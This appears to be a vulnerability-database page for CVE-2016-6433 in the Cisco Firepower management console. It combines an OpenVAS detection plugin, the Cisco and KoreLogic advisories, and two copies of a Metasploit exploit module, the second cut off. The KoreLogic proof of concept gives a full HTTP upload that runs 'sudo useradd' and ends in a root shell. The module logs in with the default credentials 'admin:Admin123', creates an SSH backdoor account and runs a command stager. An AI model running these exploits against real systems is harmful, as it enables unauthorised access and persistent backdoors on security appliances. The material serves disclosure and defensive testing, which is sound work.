Cisco Firepower Threat Management Console Remote Command Execution Vulnerability

2016-10-06T00:00:00

Description

A vulnerability in Cisco Firepower Threat Management Console could allow an authenticated, remote attacker to execute arbitrary commands on a targeted system.

{"id": "OPENVAS:1361412562310106333", "type": "openvas", "bulletinFamily": "scanner", "title": "Cisco Firepower Threat Management Console Remote Command Execution Vulnerability", "description": "A vulnerability in Cisco Firepower Threat Management Console could allow an\n authenticated, remote attacker to execute arbitrary commands on a targeted system.", "published": "2016-10-06T00:00:00", "modified": "2020-04-03T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106333", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc"], "cvelist": ["CVE-2016-6433"], "lastseen": "2020-04-07T18:45:01", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cisco", "idList": ["CISCO-SA-20161005-FTMC"]}, {"type": "cve", "idList": ["CVE-2016-6433"]}, {"type": "exploitdb", "idList": ["EDB-ID:40463"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:080F4291E285CF4785D54B4437C49803"]}, {"type": "korelogic", "idList": ["KL-001-2016-007"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138988", "PACKETSTORM:140467"]}, {"type": "pentestit", "idList": ["PENTESTIT:30AF1FB3AAE47288E800B5587788AF45"]}, {"type": "seebug", "idList": ["SSV:92711"]}, {"type": "zdt", "idList": ["1337DAY-ID-26656"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cisco", "idList": ["CISCO-SA-20161005-FTMC"]}, {"type": "cve", "idList": ["CVE-2016-6433"]}, {"type": "exploitdb", "idList": ["EDB-ID:40463"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/CISCO_FIREPOWER_USERADD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138988"]}, {"type": "zdt", "idList": ["1337DAY-ID-26656"]}]}, "exploitation": null, "vulnersScore": 0.8}, "pluginID": "1361412562310106333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Cisco Firepower Threat Management Console Remote Command Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:firepower_management_center\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106333\");\n script_cve_id(\"CVE-2016-6433\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_version(\"2020-04-03T09:54:35+0000\");\n\n script_name(\"Cisco Firepower Threat Management Console Remote Command Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A vulnerability in Cisco Firepower Threat Management Console could allow an\n authenticated, remote attacker to execute arbitrary commands on a targeted system.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists because parameters sent to the web application are\n not properly validated. This may lead an authenticated web user to run arbitrary system commands as the www user\n account on the server.\");\n\n script_tag(name:\"impact\", value:\"An attacker with user privileges on the web application may be able to\n leverage this vulnerability to gain access to the underlying operating system.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 09:54:35 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-06 10:54:17 +0700 (Thu, 06 Oct 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_firepower_management_center_consolidation.nasl\");\n script_mandatory_keys(\"cisco/firepower_management_center/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\naffected = make_list(\n '5.2.0',\n '5.3.0',\n '5.3.0.2',\n '5.3.0.3',\n '5.3.0.4',\n '5.3.1',\n '5.3.1.3',\n '5.3.1.4',\n '5.3.1.5',\n '5.3.1.6',\n '5.4.1.3',\n '5.4.1.5',\n '5.4.1.4',\n '5.4.1.2',\n '5.4.1.1',\n '5.4.1',\n '5.4.0',\n '5.4.0.2',\n '5.4.1.6',\n '6.0.1' );\n\nforeach af ( affected ) {\n if( version == af ) {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "naslFamily": "CISCO", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659976447, "score": 1659977168}, "_internal": {"score_hash": "7faf94227423859a72be1257ae8687eb"}}

{"exploitpack": [{"lastseen": "2020-04-01T19:04:08", "description": "\nCisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "title": "Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "EXPLOITPACK:080F4291E285CF4785D54B4437C49803", "href": "", "sourceData": "KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command\nExecution Leading to Root Access\n\nTitle: Cisco Firepower Threat Management Console Remote Command Execution\nLeading to Root Access\nAdvisory ID: KL-001-2016-007\nPublication Date: 2016.10.05\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Cisco\n Affected Product: Firepower Threat Management Console\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\n Platform: Embedded Linux\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\n Type, CWE-94: Improper Control of Generation of Code\n Impact: Arbitrary Code Execution\n Attack vector: HTTP\n CVE-ID: CVE-2016-6433\n\n2. Vulnerability Description\n\n An authenticated user can run arbitrary system commands as\n the www user which leads to root.\n\n3. Technical Description\n\n A valid session and CSRF token is required. The webserver runs as\n a non-root user which is permitted to sudo commands as root with\n no password.\n\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\n Host: 1.3.3.7\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)\nGecko/20100101 Firefox/45.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate, br\n DNT: 1\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\n Connection: close\n Content-Type: multipart/form-data;\nboundary=---------------------------15519792567789791301241925798\n Content-Length: 813\n\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"manual_update\"\n\n 1\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"source\"\n\n file\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"file\";\nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\n Content-Type: application/octet-stream\n\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"action_submit\"\n\n Import\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"sf_action_id\"\n\n 8c6059ae8dbedc089877b16b7be2ae7f\n -----------------------------15519792567789791301241925798--\n\n\n HTTP/1.1 200 OK\n Date: Sat, 23 Apr 2016 13:38:01 GMT\n Server: Apache\n Vary: Accept-Encoding\n X-Frame-Options: SAMEORIGIN\n Content-Length: 49998\n Connection: close\n Content-Type: text/html; charset=utf-8\n\n ...\n\n $ ssh korelogic@1.3.3.7\n Password:\n\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\n Cisco is a registered trademark of Cisco Systems, Inc.\n All other trademarks are property of their respective owners.\n\n Cisco Fire Linux OS v6.0.1 (build 37)\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\n\n Could not chdir to home directory /Volume/home/korelogic: No such file or\ndirectory\n korelogic@firepower:/$ sudo su -\n Password:\n root@firepower:~#\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has acknowledged this vulnerability but has\n not issued a fix. Vendor acknowledgement available at:\n\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of\nKoreLogic, Inc.\n\n6. Disclosure Timeline\n\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\n this vulnerability and for 3 others reported in the\n same product.\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.09 - KoreLogic asks for an update on the status of the\n remediation efforts.\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\n completed.\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\n will be released publicly on 2016.10.05.\n 2016.10.05 - Public disclosure.\n\n7. Proof of Concept\n\n See Technical Description\n\n\nThe contents of this advisory are copyright(c) 2016\nKoreLogic, Inc. and are licensed under a Creative Commons\nAttribution Share-Alike 4.0 (United States) License:\nhttp://creativecommons.org/licenses/by-sa/4.0/\n\nKoreLogic, Inc. is a founder-owned and operated company with a\nproven track record of providing security services to entities\nranging from Fortune 500 to small and mid-sized companies. We\nare a highly skilled team of senior security consultants doing\nby-hand security assessments for the most important networks in\nthe U.S. and around the world. We are also developers of various\ntools and resources aimed at helping the security community.\nhttps://www.korelogic.com/about-korelogic.html\n\nOur public vulnerability disclosure policy is available at:\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-03-23T01:47:40", "description": "A vulnerability in Cisco Firepower Threat Management Console could allow an authenticated, remote attacker to execute arbitrary commands on a targeted system.\n\nThe vulnerability exists because parameters sent to the web application are not properly validated. This may lead an authenticated web user to run arbitrary system commands as the www user account on the server. An attacker with user privileges on the web application may be able to leverage this vulnerability to gain access to the underlying operating system.\n\nCisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available. \n\nThis advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\"]", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-05T16:00:00", "type": "cisco", "title": "Cisco Firepower Threat Management Console Remote Command Execution Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T16:00:00", "id": "CISCO-SA-20161005-FTMC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:01:21", "description": "No description provided by source.", "cvss3": {}, "published": "2017-02-24T00:00:00", "type": "seebug", "title": "Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (CVE-2016-6433)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-02-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92711", "id": "SSV:92711", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Cisco Firepower Management Console.\r\n The management system contains a configuration flaw that allows the www user to\r\n execute the useradd binary, which can be abused to create backdoor accounts.\r\n Authentication is required to exploit this vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt', # Original discovery & PoC\r\n 'sinn3r' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-6433' ],\r\n [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 10 2016',\r\n 'CmdStagerFlavor'=> %w{ echo },\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => 'true',\r\n 'SSLVersion' => 'Auto',\r\n 'RPORT' => 443\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n # admin:Admin123 is the default credential for 6.0.1\r\n OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),\r\n OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),\r\n OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),\r\n OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),\r\n OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # For this exploit to work, we need to check two services:\r\n # * HTTP - To create the backdoor account for SSH\r\n # * SSH - To execute our payload\r\n\r\n vprint_status('Checking Cisco Firepower Management console...')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')\r\n })\r\n\r\n if res && res.code == 200\r\n vprint_status(\"Console is found.\")\r\n vprint_status(\"Checking SSH service.\")\r\n begin\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n Net::SSH.start(rhost, 'admin',\r\n port: datastore['SSHPORT'],\r\n password: Rex::Text.rand_text_alpha(5),\r\n auth_methods: ['password'],\r\n non_interactive: true\r\n )\r\n end\r\n rescue Timeout::Error\r\n vprint_error('The SSH connection timed out.')\r\n return Exploit::CheckCode::Unknown\r\n rescue Net::SSH::AuthenticationFailed\r\n # Hey, it talked. So that means SSH is running.\r\n return Exploit::CheckCode::Appears\r\n rescue Net::SSH::Exception => e\r\n vprint_error(e.message)\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_sf_action_id(sid)\r\n requirements = {}\r\n\r\n print_status('Attempting to obtain sf_action_id from rulesimport.cgi')\r\n\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\"\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')\r\n end\r\n\r\n sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]\r\n\r\n unless sf_action_id\r\n fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')\r\n end\r\n\r\n sf_action_id\r\n end\r\n\r\n def create_ssh_backdoor(sid, user, pass)\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n sf_action_id = get_sf_action_id(sid)\r\n sh_name = 'exploit.sh'\r\n\r\n print_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\")\r\n\r\n mime_data = Rex::MIME::Message.new\r\n mime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"')\r\n mime_data.add_part('file', nil, nil, 'form-data; name=\"source\"')\r\n mime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"')\r\n mime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"')\r\n mime_data.add_part(\r\n \"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\",\r\n 'application/octet-stream',\r\n nil,\r\n \"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\"\r\n )\r\n\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\",\r\n 'data' => mime_data.to_s,\r\n 'vars_get' => { 'no_mojo' => '1' },\r\n })\r\n end\r\n\r\n def generate_new_username\r\n datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def generate_new_password\r\n datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def report_cred(opts)\r\n service_data = {\r\n address: rhost,\r\n port: rport,\r\n service_name: 'cisco',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: fullname,\r\n username: opts[:user],\r\n private_data: opts[:password],\r\n private_type: :password\r\n }.merge(service_data)\r\n\r\n login_data = {\r\n last_attempted_at: DateTime.now,\r\n core: create_credential(credential_data),\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\r\n proof: opts[:proof]\r\n }.merge(service_data)\r\n\r\n create_credential_login(login_data)\r\n end\r\n\r\n def do_login\r\n console_user = datastore['USERNAME']\r\n console_pass = datastore['PASSWORD']\r\n uri = normalize_uri(target_uri.path, 'login.cgi')\r\n\r\n print_status(\"Attempting to login in as #{console_user}:#{console_pass}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_post' => {\r\n 'username' => console_user,\r\n 'password' => console_pass,\r\n 'target' => ''\r\n }\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')\r\n end\r\n\r\n res_cookie = res.get_cookies\r\n if res.code == 302 && res_cookie.include?('CGISESSID')\r\n cgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first\r\n print_status(\"CGI Session ID: #{cgi_sid}\")\r\n print_good(\"Authenticated as #{console_user}:#{console_pass}\")\r\n report_cred(username: console_user, password: console_pass)\r\n return cgi_sid\r\n end\r\n\r\n nil\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n @first_exec = true\r\n cmd.gsub!(/\\/tmp/, '/usr/tmp')\r\n\r\n # Weird hack for the cmd stager.\r\n # Because it keeps using > to write the payload.\r\n if @first_exec\r\n @first_exec = false\r\n else\r\n cmd.gsub!(/>>/, ' > ')\r\n end\r\n\r\n begin\r\n Timeout.timeout(3) do\r\n @ssh_socket.exec!(\"#{cmd}\\n\")\r\n vprint_status(\"Executing #{cmd}\")\r\n end\r\n rescue Timeout::Error\r\n fail_with(Failure::Unknown, 'SSH command timed out')\r\n rescue Net::SSH::ChannelOpenFailed\r\n print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')\r\n retry\r\n end\r\n end\r\n\r\n def init_ssh_session(user, pass)\r\n print_status(\"Attempting to log into SSH as #{user}:#{pass}\")\r\n\r\n factory = ssh_socket_factory\r\n opts = {\r\n auth_methods: ['password', 'keyboard-interactive'],\r\n port: datastore['SSHPORT'],\r\n use_agent: false,\r\n config: false,\r\n password: pass,\r\n proxy: factory,\r\n non_interactive: true\r\n }\r\n\r\n opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n ssh = nil\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n @ssh_socket = Net::SSH.start(rhost, user, opts)\r\n end\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, e.message)\r\n end\r\n end\r\n\r\n def exploit\r\n # To exploit the useradd vuln, we need to login first.\r\n sid = do_login\r\n return unless sid\r\n\r\n # After login, we can call the useradd utility to create a backdoor user\r\n new_user = generate_new_username\r\n new_pass = generate_new_password\r\n create_ssh_backdoor(sid, new_user, new_pass)\r\n\r\n # Log into the SSH backdoor account\r\n init_ssh_session(new_user, new_pass)\r\n\r\n begin\r\n execute_cmdstager({:linemax => 500})\r\n ensure\r\n @ssh_socket.close\r\n end\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92711", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-01-12T02:03:22", "description": "", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140467", "href": "https://packetstormsecurity.com/files/140467/Cisco-Firepower-Management-Console-6.0-Post-Authentication-UserAdd.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::SSH \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Cisco Firepower Management Console. \nThe management system contains a configuration flaw that allows the www user to \nexecute the useradd binary, which can be abused to create backdoor accounts. \nAuthentication is required to exploit this vulnerability. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Matt', # Original discovery & PoC \n'sinn3r' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2016-6433' ], \n[ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ] \n], \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Targets' => \n[ \n[ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Oct 10 2016', \n'CmdStagerFlavor'=> %w{ echo }, \n'DefaultOptions' => \n{ \n'SSL' => 'true', \n'SSLVersion' => 'Auto', \n'RPORT' => 443 \n}, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \n# admin:Admin123 is the default credential for 6.0.1 \nOptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), \nOptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), \nOptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']), \nOptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']), \nOptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), \nOptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22]) \n], self.class) \nend \n \ndef check \n# For this exploit to work, we need to check two services: \n# * HTTP - To create the backdoor account for SSH \n# * SSH - To execute our payload \n \nvprint_status('Checking Cisco Firepower Management console...') \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213') \n}) \n \nif res && res.code == 200 \nvprint_status(\"Console is found.\") \nvprint_status(\"Checking SSH service.\") \nbegin \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \nNet::SSH.start(rhost, 'admin', \nport: datastore['SSHPORT'], \npassword: Rex::Text.rand_text_alpha(5), \nauth_methods: ['password'], \nnon_interactive: true \n) \nend \nrescue Timeout::Error \nvprint_error('The SSH connection timed out.') \nreturn Exploit::CheckCode::Unknown \nrescue Net::SSH::AuthenticationFailed \n# Hey, it talked. So that means SSH is running. \nreturn Exploit::CheckCode::Appears \nrescue Net::SSH::Exception => e \nvprint_error(e.message) \nend \nend \n \nExploit::CheckCode::Safe \nend \n \ndef get_sf_action_id(sid) \nrequirements = {} \n \nprint_status('Attempting to obtain sf_action_id from rulesimport.cgi') \n \nuri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri, \n'cookie' => \"CGISESSID=#{sid}\" \n}) \n \nunless res \nfail_with(Failure::Unknown, 'Failed to obtain rules import requirements.') \nend \n \nsf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1] \n \nunless sf_action_id \nfail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi') \nend \n \nsf_action_id \nend \n \ndef create_ssh_backdoor(sid, user, pass) \nuri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') \nsf_action_id = get_sf_action_id(sid) \nsh_name = 'exploit.sh' \n \nprint_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\") \n \nmime_data = Rex::MIME::Message.new \nmime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"') \nmime_data.add_part('file', nil, nil, 'form-data; name=\"source\"') \nmime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"') \nmime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"') \nmime_data.add_part( \n\"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\", \n'application/octet-stream', \nnil, \n\"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\" \n) \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'cookie' => \"CGISESSID=#{sid}\", \n'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\", \n'data' => mime_data.to_s, \n'vars_get' => { 'no_mojo' => '1' }, \n}) \nend \n \ndef generate_new_username \ndatastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5) \nend \n \ndef generate_new_password \ndatastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5) \nend \n \ndef report_cred(opts) \nservice_data = { \naddress: rhost, \nport: rport, \nservice_name: 'cisco', \nprotocol: 'tcp', \nworkspace_id: myworkspace_id \n} \n \ncredential_data = { \norigin_type: :service, \nmodule_fullname: fullname, \nusername: opts[:user], \nprivate_data: opts[:password], 